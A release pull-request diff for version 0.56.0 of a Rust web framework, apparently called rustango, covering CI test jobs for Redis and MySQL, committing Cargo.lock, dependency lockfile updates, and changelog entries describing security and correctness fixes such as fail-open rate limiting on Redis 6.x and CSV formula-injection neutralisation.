### PR TITLE
release: 0.56.0 — promote develop → main

### DIFF
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -459,6 +459,15 @@ jobs:
       - uses: Swatinem/rust-cache@v2
       - run: cargo test -p rustango --features mysql,jobs-postgres --test jobs_mysql_live
       - run: cargo test -p rustango --features mysql --test mysql_live
+      # Again under --all-features. #1277: MySQL enforces FKs and has no
+      # `DROP TABLE … CASCADE`, so `drop_all_pool` failed whenever it dropped
+      # a parent (`rustango_users`) before its child (`rustango_api_keys`).
+      # Which order that walk takes depends on how many models are registered,
+      # so only a full-feature build reliably provokes it — the bare
+      # `--features mysql` run above never did, which is why this went
+      # unnoticed. Keep both: the narrow run guards the common config, this
+      # one guards the FK-ordering regression.
+      - run: cargo test -p rustango --all-features --test mysql_live
       - run: cargo test -p rustango --features mysql --test explain_pool_mysql_live
       - run: cargo test -p rustango --features mysql --test bulk_upsert_mysql_live
       - run: cargo test -p rustango --features mysql,tenancy --test tenancy_manage_mysql_live

--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -318,6 +318,9 @@ jobs:
       - run: cargo test -p rustango --no-default-features --features sqlite,tenancy --test queryset_none
       - run: cargo test -p rustango --no-default-features --features sqlite,tenancy --test queryset_exclude_sqlite_live
       - run: cargo test -p rustango --no-default-features --features sqlite,tenancy --test sqlmigrate
+      # #1273 — derive(ViewSet) must compile with no postgres feature.
+      - run: cargo test -p rustango --no-default-features --features sqlite,admin --test viewset_derive_pool_tridialect_compile --no-run
+      - run: cargo test -p rustango --no-default-features --features mysql,admin --test viewset_derive_pool_tridialect_compile --no-run
       - run: cargo test -p rustango --no-default-features --features sqlite,tenancy --test queryset_set_ops
       - run: cargo test -p rustango --no-default-features --features sqlite,tenancy --test set_algebra_emission
       - run: cargo test -p rustango --no-default-features --features sqlite,tenancy --test migrate_runpython_sqlite_live

--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -425,6 +425,41 @@ jobs:
             --test django6_writes \
             --test django6_delta
 
+  # Redis live suite. `cache-redis` is off by default, so until #1280
+  # there was no Redis service here at all and nothing exercised
+  # `RedisCache` — which is how `incr` shipped using `EXPIRE … NX`, a
+  # Redis 7.0+ form. On 6.x every call errored, and both callers fail
+  # open, so rate limiting and account lockout silently did nothing.
+  #
+  # The matrix is the point: run the SAME suite against 6 and 7. A
+  # 7-only job passes on the broken code and proves nothing.
+  redis_live:
+    runs-on: ubuntu-latest
+    strategy:
+      fail-fast: false
+      matrix:
+        redis: ["6", "7"]
+    services:
+      redis:
+        # AWS Public ECR mirror — same Docker Hub rate-limit reason as
+        # the `postgres_test` / `mysql_live` services.
+        image: public.ecr.aws/docker/library/redis:${{ matrix.redis }}
+        ports:
+          - 6379:6379
+        options: >-
+          --health-cmd "redis-cli ping"
+          --health-interval 2s
+          --health-timeout 2s
+          --health-retries 30
+    env:
+      REDIS_TEST_URL: redis://127.0.0.1:6379/
+    steps:
+      - uses: actions/checkout@v4
+      - uses: dtolnay/rust-toolchain@1.88
+      - uses: Swatinem/rust-cache@v2
+      - run: cargo test -p rustango --features cache,cache-redis --test cache_redis_incr_live
+      - run: cargo test -p rustango --features cache,cache-redis --test cache_redis_prefix_live
+
   # v0.41 MySQL parity — the marketing claim is tri-dialect end-to-end
   # since v0.38, but every MySQL `_live.rs` test was skipped silently
   # in CI because `MYSQL_TEST_URL` was never set. This job runs the
@@ -473,6 +508,20 @@ jobs:
       - run: cargo test -p rustango --features mysql,tenancy --test tenancy_manage_mysql_live
       - run: cargo test -p rustango --features mysql,tenancy,testkit --test permissions_mysql_live
       - run: cargo test -p rustango --features mysql,tenancy,testkit --test database_pools_mysql_live
+      # #1281 — the MySQL arm of DatabaseCache::add is bespoke SQL
+      # (INSERT IGNORE + conditional UPDATE, since ON DUPLICATE KEY
+      # UPDATE takes no WHERE). It is also positional-`?`, so a bind
+      # ordering that Postgres' numbered `$n` tolerates breaks here.
+      #
+      # `--no-default-features` matters: the default set includes
+      # `postgres`, which would compile this file's Postgres case into a
+      # job that runs no Postgres service. `DATABASE_URL` is defined
+      # workflow-wide, so that case would find the variable set, dial a
+      # server that is not there, and spend 30s timing out. The test
+      # skips unreachable backends rather than failing, but not building
+      # the arm at all is both faster and more honest about what this
+      # job covers. Postgres is exercised by `postgres_test`.
+      - run: cargo test -p rustango --no-default-features --features mysql,cache --test cache_db_backend_add_live
       - run: cargo test -p rustango --features mysql,tenancy,mcp,testkit --test mcp_user_keys_mysql_live
       - run: cargo test -p rustango --features mysql --test audit_mysql_live
       - run: cargo test -p rustango --features mysql --test fixtures_mysql_live

--- a/.gitignore
+++ b/.gitignore
@@ -1,12 +1,22 @@
 /target
-/Cargo.lock
+# Cargo.lock IS committed. This workspace ships a binary
+# (`cargo-rustango`), which is the textbook case for committing it, and
+# ignoring it cost us twice: a fresh CI resolve picked up the broken
+# `time` 0.3.48 and then `tinyvec` 1.13.0, reddening every job on a
+# green commit with no change of ours. Committing it makes CI
+# reproducible and lets a bad upstream release be handled deliberately
+# (bump the lock when we choose) instead of at the moment it lands.
 **/*.rs.bk
 
 # Nested example projects (cookbook_blog, blog_demo, etc.) are
 # standalone Cargo packages with their own target/ + Cargo.lock —
 # don't commit either.
 crates/rustango/examples/*/target/
-crates/rustango/examples/*/Cargo.lock
+# …but their Cargo.lock IS committed, for the same reason as the
+# workspace one above. These packages sit outside `members`, so they
+# resolve their own dependency tree — the workspace lock does not reach
+# them, and `tinyvec` 1.13.0 reddened every `doc_examples` job even
+# after the workspace lock was pinned.
 # shared target dir bin/examples.sh builds every example into (override: EX_TARGET)
 /target-examples/
 .DS_Store

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,6 +4,34 @@ All notable changes to rustango. The format follows [Keep a Changelog](https://k
 
 ## [Unreleased]
 
+### Added
+- **MCP: the raw `prefix.secret` credential is accepted as the Bearer token.**
+  A show-once agent key now works directly in any MCP client
+  (`Authorization: Bearer <prefix.secret>`) with no `POST /mcp/token` exchange
+  step. New `mcp::verify_raw_agent_credential` and
+  `tenancy::authenticate_agent_by_prefix_pool` (lookup by secret prefix rather
+  than agent name — a bearer client never knows the agent's name; fail-closed
+  and timing-neutral, burning a dummy argon2 verify on unknown prefixes per
+  #1099).
+
+  On this path liveness **and** grant resolution run on *every* request, so
+  capabilities always track the owner's live RBAC and revocation applies
+  immediately — strictly fresher than a minted JWT's claim snapshot. Only the
+  argon2 hash check is memoised, in a bounded process-local cache (256 entries,
+  60s TTL) keyed by `sha256(tenant \0 token)` so a credential verified for one
+  tenant can never authenticate against another. A malformed bearer is rejected
+  by a shape gate before any DB or argon2 work. The JWT path is tried first and
+  is unchanged.
+
+  **Deployment note:** because unknown prefixes deliberately burn a dummy argon2
+  verify to stay timing-neutral, set `[mcp] rate_limit_per_minute` in production
+  to bound the verification work an unauthenticated caller can induce.
+
+### Changed
+- **`[mcp] max_body_bytes` is now configurable** (default unchanged at 1 MiB,
+  still tighter than axum's 2 MiB). Raise it for tools that accept inline
+  payloads such as base64 media uploads; it was previously a hard-coded const.
+
 ## [0.55.0] — 2026-08-31
 
 Follows 0.54.0 with the LIKE-escaping correctness fix and a README version

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,6 +4,24 @@ All notable changes to rustango. The format follows [Keep a Changelog](https://k
 
 ## [Unreleased]
 
+## [0.56.0] — 2026-09-04
+
+A correctness and hardening release. Three of these were **silent** failures —
+a control that reported success while doing nothing — which is the property
+that makes a bug dangerous regardless of its severity.
+
+The headline items: rate limiting and account lockout did nothing at all on
+Redis 6.x; `DistributedLock` provided no mutual exclusion on `DatabaseCache`
+(measured: 13 of 16 concurrent acquirers won); and `drop_all_pool` failed on
+MySQL for any schema with foreign keys. CSV export gained formula-injection
+neutralisation, `bulk_insert` now batches against the backend's bind-parameter
+ceiling, and sqlx finally has a TLS backend so managed Postgres/MySQL
+(Supabase, Neon, RDS) work at all.
+
+Also: `Cargo.lock` is now committed. Ignoring it let two separate broken
+upstream releases (`time` 0.3.48, then `tinyvec` 1.13.0) turn every CI job red
+on unchanged code.
+
 ### Security
 - **Rate limiting and account lockout silently did nothing on Redis 6.x**
   (#1280). `RedisCache::incr` set its window TTL with `EXPIRE key secs NX`, and

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -23,6 +23,12 @@ Also: README install snippets bumped to the current version (docs.rs renders the
 README as the crate landing page).
 
 ### Fixed
+- **`#[derive(ViewSet)]` failed to compile without the `postgres` feature**
+  (#1273). The generated `router()` named `sqlx::PgPool`, so any sqlite/mysql-only
+  project got `cannot find type PgPool`. It now takes `impl Into<sql::Pool>` and
+  calls `router_pool`, accepting every backend's pool (PG callers unaffected). A
+  tri-dialect compile test — run under sqlite-only and mysql-only in CI — guards
+  it; the old derive test was `postgres`-gated, so nothing caught this.
 - **LIKE lookups did not escape user wildcards, on any dialect** (#1257).
   `__contains` / `__startswith` / `__endswith` (and the admin/viewset `?q=`
   search and `template_views` list search) built `%value%` from raw user input

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -31,6 +31,24 @@ All notable changes to rustango. The format follows [Keep a Changelog](https://k
 - **`[mcp] max_body_bytes` is now configurable** (default unchanged at 1 MiB,
   still tighter than axum's 2 MiB). Raise it for tools that accept inline
   payloads such as base64 media uploads; it was previously a hard-coded const.
+### Fixed
+- **`migrate::drop_all_pool` failed on MySQL whenever the schema had foreign
+  keys** (#1277). It dropped tables in model-registration order with `CASCADE`
+  emitted for Postgres only — fine on PG (cascades) and on SQLite (which leaves
+  `foreign_keys` off by default), but MySQL enforces FKs and rejects `CASCADE`
+  on `DROP TABLE`, so the call failed outright as soon as a parent was dropped
+  before its child (`rustango_users` before `rustango_api_keys`). Whether that
+  happened depended on how many models were registered, making it look
+  intermittent.
+
+  `drop_all_pool` is now two-phase — drop FK constraints, then drop tables —
+  mirroring `apply_all`'s two-phase create, so drop order is irrelevant on every
+  dialect. New emitter `migrate::ddl::drop_constraints_sql_with_dialect` (the
+  inverse of `create_constraints_sql_with_dialect`; empty for SQLite, which
+  inlines FKs and has no named constraint to drop). No session-level
+  `FOREIGN_KEY_CHECKS` toggling, which on a pooled connection would not reliably
+  reach the connection doing the drops — and would leak to the next borrower
+  (#1224).
 
 ## [0.55.0] — 2026-08-31
 

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,6 +4,70 @@ All notable changes to rustango. The format follows [Keep a Changelog](https://k
 
 ## [Unreleased]
 
+### Security
+- **Rate limiting and account lockout silently did nothing on Redis 6.x**
+  (#1280). `RedisCache::incr` set its window TTL with `EXPIRE key secs NX`, and
+  the `NX` flag is Redis **7.0+**; on 6.x the server rejects the command, so
+  `incr` returned `Err` on every call. Both callers fail open — the rate
+  limiter returns `Ok((0, 0))` and account lockout `unwrap_or(0)`, never
+  reaching `max_attempts` — so neither control engaged, with no signal beyond a
+  per-request warning. The `INCRBY` had already landed, so counters were also
+  created with no TTL and never expired.
+
+  Now a single `EVAL` script does the increment and a conditional expiry
+  together, preserving the set-TTL-only-once semantic a fixed window needs.
+  `EVAL` is Redis 2.6+, so it works on 6.x and managed hosts alike. Verified
+  against real 6.2 and 7.4 servers; CI now runs the Redis suite as a 6-and-7
+  matrix, since a 7-only job passes on the broken code.
+
+  Account lockout still fails open on a cache error (locking every account out
+  during an outage is its own denial of service) but now logs a warning instead
+  of failing silently.
+- **CSV export did not neutralise spreadsheet formula injection** (#1283,
+  CWE-1236). A cell beginning `=`, `+`, `-`, `@` (or tab/CR) was written
+  verbatim and evaluated on open in Excel / LibreOffice / Sheets; RFC 4180
+  quoting does not help, since the quotes are stripped before the cell is
+  parsed. Reachable via the module's own documented recipe — exporting user
+  names and emails for an operator to download.
+
+  Such values are now prefixed with `'`. Numbers are deliberately exempt so
+  exports full of negative numbers are not mangled. New
+  `csv::neutralize_formula`; opt out with `CsvWriter::raw_formulas()` for
+  machine-consumed output.
+- **`?ordering=` accepted columns the ViewSet does not expose** (#1282). With
+  no explicit `ordering_fields`, the allowlist check was skipped entirely, so a
+  ViewSet declaring `fields = "id, title"` still honoured
+  `?ordering=password_hash` — a sort oracle over a column the API never
+  returns. The allowlist now defaults to the exposed field set, matching DRF.
+  Where `fields` is unset every column is exposed anyway, so that case is
+  unchanged.
+
+### Fixed
+- **`DistributedLock` provided no mutual exclusion on `DatabaseCache`**
+  (#1281). `DatabaseCache` never overrode `Cache::add`, inheriting the trait
+  default — `exists()` then `set()`, a check-then-act whose `set` is an
+  unconditional upsert. Two racers both saw "absent", both wrote, and both got
+  `Ok(true)`. Measured: 16 concurrent acquirers produced **13 winners**; now
+  exactly one.
+
+  `add` now takes the row only when absent or already expired. Postgres and
+  SQLite use one `ON CONFLICT … DO UPDATE … WHERE`; MySQL, which has no `WHERE`
+  on `ON DUPLICATE KEY UPDATE`, uses `INSERT IGNORE` plus a conditional
+  `UPDATE`. `expires = 0` still means never, so a live persistent entry is
+  never stolen.
+- **`bulk_insert_pool` ignored the backend's bind-parameter ceiling** (#1284).
+  A multi-row `INSERT` binds `rows × columns` parameters and every backend caps
+  that — 65535 on Postgres, 32766 on modern SQLite — so a large import failed
+  with an opaque driver error (`too many SQL variables`) having inserted
+  nothing. It now batches, via the new `Dialect::max_bind_params`. Inserts
+  under the ceiling are byte-for-byte unchanged.
+
+  As in Django, a batch split across statements is no longer atomic: a mid-way
+  failure leaves earlier chunks committed. Wrap the call in a transaction when
+  you need all-or-nothing. The Postgres-only generated `Model::bulk_insert` is
+  not yet batched — it routes through an executor consumed per call and does
+  `RETURNING` PK write-back; #1284 stays open for that.
+
 ### Added
 - **MCP: the raw `prefix.secret` credential is accepted as the Bearer token.**
   A show-once agent key now works directly in any MCP client

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -31,6 +31,7 @@ All notable changes to rustango. The format follows [Keep a Changelog](https://k
 - **`[mcp] max_body_bytes` is now configurable** (default unchanged at 1 MiB,
   still tighter than axum's 2 MiB). Raise it for tools that accept inline
   payloads such as base64 media uploads; it was previously a hard-coded const.
+
 ### Fixed
 - **`migrate::drop_all_pool` failed on MySQL whenever the schema had foreign
   keys** (#1277). It dropped tables in model-registration order with `CASCADE`
@@ -49,6 +50,13 @@ All notable changes to rustango. The format follows [Keep a Changelog](https://k
   `FOREIGN_KEY_CHECKS` toggling, which on a pooled connection would not reliably
   reach the connection doing the drops — and would leak to the next borrower
   (#1224).
+- **`cargo test` opened a browser tab.** `manage docs` launches
+  `https://docs.rs/rustango` via the OS opener, and `docs` is one of the verbs
+  the `pool_free_verbs_need_no_database` unit test dispatches — so every
+  `cargo test --lib` run spawned a real tab on the developer's machine. The URL
+  is still printed, but the launch is now skipped under `cfg!(test)`, and also
+  when `RUSTANGO_NO_BROWSER` is set (for headless and CI shells, which have
+  nothing to open).
 
 ## [0.55.0] — 2026-08-31
 

--- a/Cargo.lock
+++ b/Cargo.lock
@@ -291,7 +291,7 @@ checksum = "fc652a48c352aef3ea3aed32080501cf3ef6ed5da78602a020c991775b0aff04"
 
 [[package]]
 name = "cargo-rustango"
-version = "0.55.0"
+version = "0.56.0"
 
 [[package]]
 name = "cc"
@@ -2172,7 +2172,7 @@ dependencies = [
 
 [[package]]
 name = "rustango"
-version = "0.55.0"
+version = "0.56.0"
 dependencies = [
  "argon2",
  "async-stream",
@@ -2222,7 +2222,7 @@ dependencies = [
 
 [[package]]
 name = "rustango-macros"
-version = "0.55.0"
+version = "0.56.0"
 dependencies = [
  "proc-macro-crate",
  "proc-macro2",
@@ -2233,7 +2233,7 @@ dependencies = [
 
 [[package]]
 name = "rustango-orm-macros"
-version = "0.55.0"
+version = "0.56.0"
 dependencies = [
  "rustango",
  "rustango-macros",

--- a/Cargo.lock
+++ b/Cargo.lock
@@ -1107,7 +1107,7 @@ dependencies = [
  "tokio",
  "tokio-rustls",
  "tower-service",
- "webpki-roots",
+ "webpki-roots 1.0.9",
 ]
 
 [[package]]
@@ -1372,7 +1372,7 @@ dependencies = [
  "tokio",
  "tokio-rustls",
  "url",
- "webpki-roots",
+ "webpki-roots 1.0.9",
 ]
 
 [[package]]
@@ -2084,7 +2084,7 @@ dependencies = [
  "wasm-bindgen",
  "wasm-bindgen-futures",
  "web-sys",
- "webpki-roots",
+ "webpki-roots 1.0.9",
 ]
 
 [[package]]
@@ -2562,6 +2562,7 @@ dependencies = [
  "once_cell",
  "percent-encoding",
  "rust_decimal",
+ "rustls",
  "serde",
  "serde_json",
  "sha2",
@@ -2572,6 +2573,7 @@ dependencies = [
  "tracing",
  "url",
  "uuid",
+ "webpki-roots 0.26.11",
 ]
 
 [[package]]
@@ -3436,6 +3438,15 @@ checksum = "5a6580f308b1fad9207618087a65c04e7a10bc77e02c8e84e9b00dd4b12fa0bb"
 dependencies = [
  "js-sys",
  "wasm-bindgen",
+]
+
+[[package]]
+name = "webpki-roots"
+version = "0.26.11"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "521bc38abb08001b01866da9f51eb7c5d647a19260e00054a8c7fd5f9e57f7a9"
+dependencies = [
+ "webpki-roots 1.0.9",
 ]
 
 [[package]]

--- a/Cargo.lock
+++ b/Cargo.lock
@@ -1997,6 +1997,7 @@ dependencies = [
  "percent-encoding",
  "pin-project-lite",
  "ryu",
+ "sha1_smol",
  "tokio",
  "tokio-util",
  "url",
@@ -2427,6 +2428,12 @@ dependencies = [
  "cpufeatures 0.2.17",
  "digest",
 ]
+
+[[package]]
+name = "sha1_smol"
+version = "1.0.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "bbfa15b3dddfee50a0fff136974b3e1bde555604ba463834a7eb7deb6417705d"
 
 [[package]]
 name = "sha2"
@@ -2917,9 +2924,9 @@ dependencies = [
 
 [[package]]
 name = "tinyvec"
-version = "1.12.0"
+version = "1.13.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "bb4ebadaa0af04fab11ae01eb5f9fdb5f9c5b875506e210e71c07873528baa7f"
+checksum = "22e6cd18156ba6530d7deea039a6c1a6ec4f173dd330a9a53a4ea569fe85abac"
 dependencies = [
  "tinyvec_macros",
 ]

--- a/Cargo.lock
+++ b/Cargo.lock
@@ -9,6 +9,16 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "320119579fcad9c21884f5c4861d16174d0e06250625266f50fe6898340abefa"
 
 [[package]]
+name = "aead"
+version = "0.5.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d122413f284cf2d62fb1b7db97e02edb8cda96d769b16e443a4f6195e35662b0"
+dependencies = [
+ "crypto-common",
+ "generic-array",
+]
+
+[[package]]
 name = "aho-corasick"
 version = "1.1.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -33,6 +43,15 @@ dependencies = [
 ]
 
 [[package]]
+name = "arc-swap"
+version = "1.9.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c049c0be4daef0b145cb3555416b3b8ef5b7888a38aea1a3a155801fe7b0810b"
+dependencies = [
+ "rustversion",
+]
+
+[[package]]
 name = "argon2"
 version = "0.5.3"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -49,6 +68,28 @@ name = "arrayvec"
 version = "0.7.8"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "d3fb67a6e08acf24fdeccbac2cb6ac4305825bd1f117462e0e6f2f193345ad56"
+
+[[package]]
+name = "async-stream"
+version = "0.3.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0b5a71a6f37880a80d1d7f19efd781e4b5de42c88f0722cc13bcb6cc2cfe8476"
+dependencies = [
+ "async-stream-impl",
+ "futures-core",
+ "pin-project-lite",
+]
+
+[[package]]
+name = "async-stream-impl"
+version = "0.3.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c7c24de15d275a1ecfd47a380fb4d5ec9bfe0933f309ed5e705b775596a3574d"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.119",
+]
 
 [[package]]
 name = "async-trait"
@@ -89,6 +130,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "31b698c5f9a010f6573133b09e0de5408834d0c82f8d7475a89fc1867a71cd90"
 dependencies = [
  "axum-core",
+ "base64 0.22.1",
  "bytes",
  "form_urlencoded",
  "futures-util",
@@ -101,14 +143,17 @@ dependencies = [
  "matchit",
  "memchr",
  "mime",
+ "multer",
  "percent-encoding",
  "pin-project-lite",
  "serde_core",
  "serde_json",
  "serde_path_to_error",
  "serde_urlencoded",
+ "sha1",
  "sync_wrapper",
  "tokio",
+ "tokio-tungstenite",
  "tower",
  "tower-layer",
  "tower-service",
@@ -133,10 +178,31 @@ dependencies = [
 ]
 
 [[package]]
+name = "backon"
+version = "1.6.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "cffb0e931875b666fc4fcb20fee52e9bbd1ef836fd9e9e04ec21555f9f85f7ef"
+dependencies = [
+ "fastrand",
+]
+
+[[package]]
+name = "base16ct"
+version = "0.2.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4c7f02d4ea65f2c1853089ffd8d2787bdbc63de2f0d29dedbcf8ccdfa0ccd4cf"
+
+[[package]]
 name = "base64"
 version = "0.22.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "72b3254f16251a8381aa12e40e3c4d2f0199f8c6508fbecb9d91f575e0fbb8c6"
+
+[[package]]
+name = "base64"
+version = "0.23.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ac07cdecf99051d9a5238b80f35af32cdeba5b336e55d957b318b50137e18da5"
 
 [[package]]
 name = "base64ct"
@@ -224,6 +290,10 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "fc652a48c352aef3ea3aed32080501cf3ef6ed5da78602a020c991775b0aff04"
 
 [[package]]
+name = "cargo-rustango"
+version = "0.55.0"
+
+[[package]]
 name = "cc"
 version = "1.4.4"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -247,6 +317,17 @@ checksum = "f079e83a288787bcd14a6aea84cee5c87a67c5a3e660c30f557a3d24761b3527"
 
 [[package]]
 name = "chacha20"
+version = "0.9.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c3613f74bd2eac03dad61bd53dbe620703d4371614fe0bc3b9f04dd36fe4e818"
+dependencies = [
+ "cfg-if",
+ "cipher",
+ "cpufeatures 0.2.17",
+]
+
+[[package]]
+name = "chacha20"
 version = "0.10.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "65c35e4b699c7e15ccbe7ee35c005e4fc0a278d22238a2857e6ce2dadeda1b06"
@@ -254,6 +335,19 @@ dependencies = [
  "cfg-if",
  "cpufeatures 0.3.1",
  "rand_core 0.10.1",
+]
+
+[[package]]
+name = "chacha20poly1305"
+version = "0.10.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "10cd79432192d1c0f4e1a0fef9527696cc039165d729fb41b3f4f4f354c2dc35"
+dependencies = [
+ "aead",
+ "chacha20 0.9.1",
+ "cipher",
+ "poly1305",
+ "zeroize",
 ]
 
 [[package]]
@@ -266,6 +360,58 @@ dependencies = [
  "num-traits",
  "serde",
  "windows-link",
+]
+
+[[package]]
+name = "ciborium"
+version = "0.2.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "42e69ffd6f0917f5c029256a24d0161db17cea3997d185db0d35926308770f0e"
+dependencies = [
+ "ciborium-io",
+ "ciborium-ll",
+ "serde",
+]
+
+[[package]]
+name = "ciborium-io"
+version = "0.2.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "05afea1e0a06c9be33d539b876f1ce3692f4afea2cb41f740e7743225ed1c757"
+
+[[package]]
+name = "ciborium-ll"
+version = "0.2.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "57663b653d948a338bfb3eeba9bb2fd5fcfaecb9e199e87e1eda4d9e8b240fd9"
+dependencies = [
+ "ciborium-io",
+ "half",
+]
+
+[[package]]
+name = "cipher"
+version = "0.4.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "773f3b9af64447d2ce9850330c473515014aa235e6a783b02db81ff39e4a3dad"
+dependencies = [
+ "crypto-common",
+ "inout",
+ "zeroize",
+]
+
+[[package]]
+name = "combine"
+version = "4.6.8"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "cfc320937d09e6de266b31b9afb480f197d7a861be86be7cb2ea7e5d1bfffc5e"
+dependencies = [
+ "bytes",
+ "futures-core",
+ "memchr",
+ "pin-project-lite",
+ "tokio",
+ "tokio-util",
 ]
 
 [[package]]
@@ -376,14 +522,39 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "61803da095bee82a81bb1a452ecc25d3b2f1416d1897eb86430c6159ef717c17"
 
 [[package]]
+name = "crunchy"
+version = "0.2.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "460fbee9c2c2f33933d720630a6a0bac33ba7053db5344fac858d4b8952d77d5"
+
+[[package]]
+name = "crypto-bigint"
+version = "0.5.5"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0dc92fb57ca44df6db8059111ab3af99a63d5d0f8375d9972e319a379c6bab76"
+dependencies = [
+ "generic-array",
+ "rand_core 0.6.4",
+ "subtle",
+ "zeroize",
+]
+
+[[package]]
 name = "crypto-common"
 version = "0.1.7"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "78c8292055d1c1df0cce5d180393dc8cce0abec0a7102adb6c7b1eef6016d60a"
 dependencies = [
  "generic-array",
+ "rand_core 0.6.4",
  "typenum",
 ]
+
+[[package]]
+name = "data-encoding"
+version = "2.11.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4583a4551df46e2792f82ceeac45e850d2e2d5debba0b91f102385cda5b11f06"
 
 [[package]]
 name = "der"
@@ -435,12 +606,70 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "1aaf95b3e5c8f23aa320147307562d361db0ae0d51242340f558153b4eb2439b"
 
 [[package]]
+name = "ecdsa"
+version = "0.16.9"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ee27f32b5c5292967d2d4a9d7f1e0b0aed2c15daded5a60300e4abb9d8020bca"
+dependencies = [
+ "der",
+ "digest",
+ "elliptic-curve",
+ "rfc6979",
+ "signature",
+ "spki",
+]
+
+[[package]]
 name = "either"
 version = "1.18.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "252afb9ae5eaa683babdc6a068b3f5726eb19e05070c731f9b2a23a7c3e8ed34"
 dependencies = [
  "serde",
+]
+
+[[package]]
+name = "elliptic-curve"
+version = "0.13.8"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b5e6043086bf7973472e0c7dff2142ea0b680d30e18d9cc40f267efbf222bd47"
+dependencies = [
+ "base16ct",
+ "crypto-bigint",
+ "digest",
+ "ff",
+ "generic-array",
+ "group",
+ "pkcs8",
+ "rand_core 0.6.4",
+ "sec1",
+ "subtle",
+ "zeroize",
+]
+
+[[package]]
+name = "email-encoding"
+version = "0.4.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "420b9da095f052ea597503e39073b5b3c522f7db933fbac202d91d24492693fd"
+dependencies = [
+ "base64 0.23.1",
+ "memchr",
+]
+
+[[package]]
+name = "email_address"
+version = "0.2.9"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e079f19b08ca6239f47f8ba8509c11cf3ea30095831f7fed61441475edd8c449"
+
+[[package]]
+name = "encoding_rs"
+version = "0.8.35"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "75030f3c4f45dafd7586dd6780965a8c7e8e285a5ecb86713e63a79c5b2766f3"
+dependencies = [
+ "cfg-if",
 ]
 
 [[package]]
@@ -478,6 +707,22 @@ checksum = "5a23add41df1562121a9393cb065eab5146a1242410f23a644851e90cfd669d2"
 dependencies = [
  "parking",
  "pin-project-lite",
+]
+
+[[package]]
+name = "fastrand"
+version = "2.5.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "da7c62ceae207dd37ea5b845da6a0696c799f85e97da1ab5b7910be3c1c80223"
+
+[[package]]
+name = "ff"
+version = "0.13.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c0b50bfb653653f9ca9095b427bed08ab8d75a137839d9ad64eb11810d5b6393"
+dependencies = [
+ "rand_core 0.6.4",
+ "subtle",
 ]
 
 [[package]]
@@ -521,6 +766,21 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "cb4cb245038516f5f85277875cdaa4f7d2c9a0fa0468de06ed190163b1581fcf"
 dependencies = [
  "percent-encoding",
+]
+
+[[package]]
+name = "futures"
+version = "0.3.34"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9a31d2a3fbaaeb2af2368bbdd904aa8e812d3c04a1ee10d3171f52d556e5d0a3"
+dependencies = [
+ "futures-channel",
+ "futures-core",
+ "futures-executor",
+ "futures-io",
+ "futures-sink",
+ "futures-task",
+ "futures-util",
 ]
 
 [[package]]
@@ -568,6 +828,17 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "53c0fa8157de1303bfffdaa1cc2a673bfffb60102f76b0ef4441659124373fed"
 
 [[package]]
+name = "futures-macro"
+version = "0.3.34"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9fb9654ba8355388abeb8dcb4fc62f511300867002afc858860463bdd9fe0c44"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 3.0.4",
+]
+
+[[package]]
 name = "futures-sink"
